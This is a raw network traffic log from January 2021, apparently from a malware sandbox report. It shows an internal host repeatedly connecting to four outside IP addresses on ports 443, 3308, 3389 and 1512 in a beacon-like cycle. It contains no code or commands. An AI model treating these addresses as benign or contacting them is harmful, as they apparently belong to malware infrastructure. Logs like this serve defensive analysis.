Jan 12, 2021 07:45:15.011872053 CET	443	49356	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:15.012223005 CET	49356	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:15.022383928 CET	49356	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:15.022741079 CET	49356	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:15.074810982 CET	443	49356	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:15.075114965 CET	49356	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:15.127306938 CET	443	49356	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:15.246845007 CET	443	49356	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:15.246890068 CET	443	49356	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:15.247195005 CET	49356	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:15.252913952 CET	49356	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:15.304877996 CET	443	49356	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:15.365896940 CET	49357	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:15.409190893 CET	3308	49357	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:15.409404993 CET	49357	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:15.420345068 CET	49357	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:15.463363886 CET	3308	49357	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:15.479064941 CET	3308	49357	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:15.479121923 CET	3308	49357	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:15.479145050 CET	49357	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:15.479183912 CET	49357	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:15.492419958 CET	49357	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:15.538294077 CET	3308	49357	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:15.538378000 CET	49357	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:15.542352915 CET	49357	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:15.542510986 CET	49357	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:15.585623980 CET	3308	49357	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:15.585731983 CET	49357	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:15.625026941 CET	3308	49357	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:15.629261017 CET	3308	49357	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:15.629328966 CET	3308	49357	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:15.742244005 CET	3308	49357	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:15.742294073 CET	3308	49357	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:15.742486954 CET	49357	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:15.745865107 CET	49357	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:15.789220095 CET	3308	49357	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:15.865364075 CET	49358	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:15.919799089 CET	3389	49358	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:15.919923067 CET	49358	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:15.921420097 CET	49358	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:15.975492001 CET	3389	49358	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:16.002150059 CET	3389	49358	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:16.002208948 CET	3389	49358	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:16.002257109 CET	49358	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:16.002302885 CET	49358	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:16.013487101 CET	49358	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:16.073285103 CET	3389	49358	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:16.073527098 CET	49358	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:16.082995892 CET	49358	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:16.083046913 CET	49358	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:16.137504101 CET	3389	49358	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:16.137701035 CET	49358	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:16.177328110 CET	3389	49358	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:16.192073107 CET	3389	49358	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:16.192131042 CET	3389	49358	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:16.281793118 CET	3389	49358	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:16.281862974 CET	3389	49358	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:16.281979084 CET	49358	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:16.282027006 CET	49358	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:16.284225941 CET	49358	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:16.339251995 CET	3389	49358	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:16.395291090 CET	49359	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:16.448508978 CET	1512	49359	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:16.448635101 CET	49359	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:16.450221062 CET	49359	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:16.503135920 CET	1512	49359	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:16.509962082 CET	1512	49359	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:16.510024071 CET	1512	49359	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:16.510067940 CET	49359	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:16.510104895 CET	49359	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:16.527163982 CET	49359	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:16.581207991 CET	1512	49359	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:16.581553936 CET	49359	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:16.591581106 CET	49359	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:16.591926098 CET	49359	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:16.644926071 CET	1512	49359	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:16.645209074 CET	49359	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:16.698276043 CET	1512	49359	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:16.802459002 CET	1512	49359	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:16.802503109 CET	1512	49359	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:16.802833080 CET	49359	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:16.808613062 CET	49359	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:16.861495018 CET	1512	49359	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:16.925995111 CET	49360	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:16.978766918 CET	443	49360	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:16.978888988 CET	49360	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:16.980957985 CET	49360	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:17.034698963 CET	443	49360	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:17.049262047 CET	443	49360	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:17.049380064 CET	49360	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:17.064426899 CET	49360	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:17.121201992 CET	443	49360	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:17.121342897 CET	49360	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:17.126404047 CET	49360	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:17.126532078 CET	49360	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:17.178637981 CET	443	49360	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:17.179063082 CET	49360	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:17.214931011 CET	443	49360	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:17.231364965 CET	443	49360	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:17.350951910 CET	443	49360	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:17.351012945 CET	443	49360	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:17.351181984 CET	49360	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:17.357012033 CET	49360	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:17.409104109 CET	443	49360	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:17.472127914 CET	49361	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:17.515414000 CET	3308	49361	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:17.515675068 CET	49361	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:17.517205000 CET	49361	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:17.560602903 CET	3308	49361	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:17.574251890 CET	3308	49361	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:17.574304104 CET	3308	49361	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:17.574543953 CET	49361	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:17.590753078 CET	49361	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:17.636590958 CET	3308	49361	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:17.636939049 CET	49361	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:17.646143913 CET	49361	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:17.646323919 CET	49361	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:17.689475060 CET	3308	49361	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:17.689878941 CET	49361	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:17.729806900 CET	3308	49361	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:17.733067989 CET	3308	49361	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:17.733084917 CET	3308	49361	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:17.846577883 CET	3308	49361	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:17.846647024 CET	3308	49361	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:17.846662045 CET	49361	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:17.846702099 CET	49361	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:17.848728895 CET	49361	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:17.892832041 CET	3308	49361	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:17.951816082 CET	49362	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:18.005831003 CET	3389	49362	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:18.005948067 CET	49362	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:18.007572889 CET	49362	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:18.061981916 CET	3389	49362	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:18.094641924 CET	3389	49362	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:18.094700098 CET	3389	49362	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:18.094754934 CET	49362	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:18.094779968 CET	49362	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:18.108063936 CET	49362	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:18.169894934 CET	3389	49362	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:18.170150042 CET	49362	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:18.179357052 CET	49362	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:18.179471970 CET	49362	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:18.233679056 CET	3389	49362	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:18.233959913 CET	49362	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:18.273340940 CET	3389	49362	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:18.287991047 CET	3389	49362	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:18.288048029 CET	3389	49362	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:18.380772114 CET	3389	49362	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:18.380841970 CET	3389	49362	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:18.380994081 CET	49362	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:18.381016970 CET	49362	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:18.384586096 CET	49362	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:18.438858032 CET	3389	49362	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:18.500920057 CET	49363	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:18.554071903 CET	1512	49363	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:18.554193974 CET	49363	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:18.555753946 CET	49363	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:18.608660936 CET	1512	49363	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:18.616223097 CET	1512	49363	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:18.616275072 CET	1512	49363	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:18.616384029 CET	49363	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:18.616437912 CET	49363	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:18.633498907 CET	49363	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:18.687675953 CET	1512	49363	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:18.687762022 CET	49363	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:18.692899942 CET	49363	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:18.693099022 CET	49363	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:18.745963097 CET	1512	49363	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:18.746229887 CET	49363	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:18.785645962 CET	1512	49363	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:18.799026966 CET	1512	49363	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:18.799093008 CET	1512	49363	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:18.900118113 CET	1512	49363	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:18.900176048 CET	1512	49363	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:18.900263071 CET	49363	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:18.900319099 CET	49363	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:18.905980110 CET	49363	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:18.959146976 CET	1512	49363	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:19.016612053 CET	49364	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:19.068617105 CET	443	49364	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:19.068861008 CET	49364	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:19.070494890 CET	49364	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:19.122277975 CET	443	49364	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:19.138649940 CET	443	49364	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:19.138760090 CET	49364	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:19.156388998 CET	49364	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:19.212294102 CET	443	49364	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:19.212630033 CET	49364	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:19.222677946 CET	49364	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:19.222995043 CET	49364	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:19.275150061 CET	443	49364	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:19.275501013 CET	49364	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:19.328804016 CET	443	49364	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:19.446777105 CET	443	49364	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:19.446852922 CET	443	49364	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:19.447063923 CET	49364	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:19.452719927 CET	49364	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:19.504625082 CET	443	49364	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:19.562633991 CET	49365	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:19.605977058 CET	3308	49365	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:19.606165886 CET	49365	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:19.607721090 CET	49365	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:19.651002884 CET	3308	49365	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:19.661561012 CET	3308	49365	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:19.661624908 CET	3308	49365	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:19.661665916 CET	49365	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:19.661690950 CET	49365	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:19.678417921 CET	49365	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:19.723318100 CET	3308	49365	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:19.723578930 CET	49365	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:19.733793974 CET	49365	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:19.734056950 CET	49365	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:19.777084112 CET	3308	49365	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:19.777199984 CET	49365	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:19.817998886 CET	3308	49365	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:19.820463896 CET	3308	49365	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:19.820519924 CET	3308	49365	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:19.934289932 CET	3308	49365	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:19.934341908 CET	3308	49365	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:19.934596062 CET	49365	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:19.940382004 CET	49365	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:19.983748913 CET	3308	49365	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:20.062629938 CET	49366	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:20.120069027 CET	3389	49366	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:20.120219946 CET	49366	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:20.120955944 CET	49366	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:20.177107096 CET	3389	49366	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:20.210853100 CET	3389	49366	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:20.210872889 CET	3389	49366	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:20.210925102 CET	49366	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:20.216150045 CET	49366	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:20.274673939 CET	3389	49366	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:20.274955988 CET	49366	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:20.284615040 CET	49366	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:20.284742117 CET	49366	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:20.339261055 CET	3389	49366	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:20.339572906 CET	49366	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:20.378882885 CET	3389	49366	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:20.394336939 CET	3389	49366	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:20.394361973 CET	3389	49366	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:20.485039949 CET	3389	49366	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:20.485106945 CET	3389	49366	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:20.485289097 CET	49366	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:20.488049030 CET	49366	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:20.542669058 CET	3389	49366	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:20.607769966 CET	49367	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:20.660895109 CET	1512	49367	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:20.661187887 CET	49367	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:20.662672043 CET	49367	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:20.715590000 CET	1512	49367	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:20.722255945 CET	1512	49367	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:20.722306013 CET	1512	49367	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:20.722342014 CET	49367	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:20.722368002 CET	49367	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:20.736741066 CET	49367	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:20.791001081 CET	1512	49367	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:20.791234016 CET	49367	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:20.801455975 CET	49367	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:20.801716089 CET	49367	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:20.854487896 CET	1512	49367	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:20.854645967 CET	49367	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:20.894001961 CET	1512	49367	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:20.907486916 CET	1512	49367	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:20.907519102 CET	1512	49367	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:21.008662939 CET	1512	49367	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:21.008693933 CET	1512	49367	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:21.008909941 CET	49367	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:21.014616966 CET	49367	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:21.067660093 CET	1512	49367	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:21.122693062 CET	49368	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:21.174999952 CET	443	49368	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:21.175076962 CET	49368	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:21.175940990 CET	49368	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:21.229959965 CET	443	49368	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:21.244668961 CET	443	49368	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:21.244790077 CET	49368	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:21.263761044 CET	49368	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:21.319437981 CET	443	49368	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:21.319686890 CET	49368	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:21.329375982 CET	49368	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:21.329565048 CET	49368	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:21.381666899 CET	443	49368	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:21.381892920 CET	49368	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:21.434350967 CET	443	49368	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:21.552525997 CET	443	49368	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:21.552592993 CET	443	49368	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:21.552799940 CET	49368	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:21.558478117 CET	49368	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:21.611186981 CET	443	49368	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:21.668613911 CET	49369	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:21.711844921 CET	3308	49369	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:21.711944103 CET	49369	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:21.713401079 CET	49369	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:21.756618023 CET	3308	49369	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:21.771559954 CET	3308	49369	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:21.771636009 CET	3308	49369	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:21.771729946 CET	49369	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:21.771754980 CET	49369	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:21.786782026 CET	49369	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:21.831836939 CET	3308	49369	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:21.832030058 CET	49369	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:21.841835022 CET	49369	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:21.841948986 CET	49369	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:21.885062933 CET	3308	49369	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:21.885174990 CET	49369	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:21.925900936 CET	3308	49369	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:21.928379059 CET	3308	49369	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:21.928425074 CET	3308	49369	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:22.042010069 CET	3308	49369	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:22.042061090 CET	3308	49369	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:22.042380095 CET	49369	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:22.048023939 CET	49369	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:22.091243982 CET	3308	49369	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:22.181576014 CET	49370	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:22.237783909 CET	3389	49370	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:22.237957954 CET	49370	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:22.239501953 CET	49370	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:22.296578884 CET	3389	49370	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:22.318125963 CET	3389	49370	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:22.318169117 CET	3389	49370	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:22.318236113 CET	49370	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:22.318278074 CET	49370	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:22.332196951 CET	49370	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:22.395626068 CET	3389	49370	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:22.395735979 CET	49370	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:22.399661064 CET	49370	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:22.399755955 CET	49370	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:22.454119921 CET	3389	49370	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:22.454268932 CET	49370	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:22.494301081 CET	3389	49370	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:22.508290052 CET	3389	49370	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:22.508352995 CET	3389	49370	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:22.600423098 CET	3389	49370	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:22.600465059 CET	3389	49370	5.100.228.233	192.168.2.22
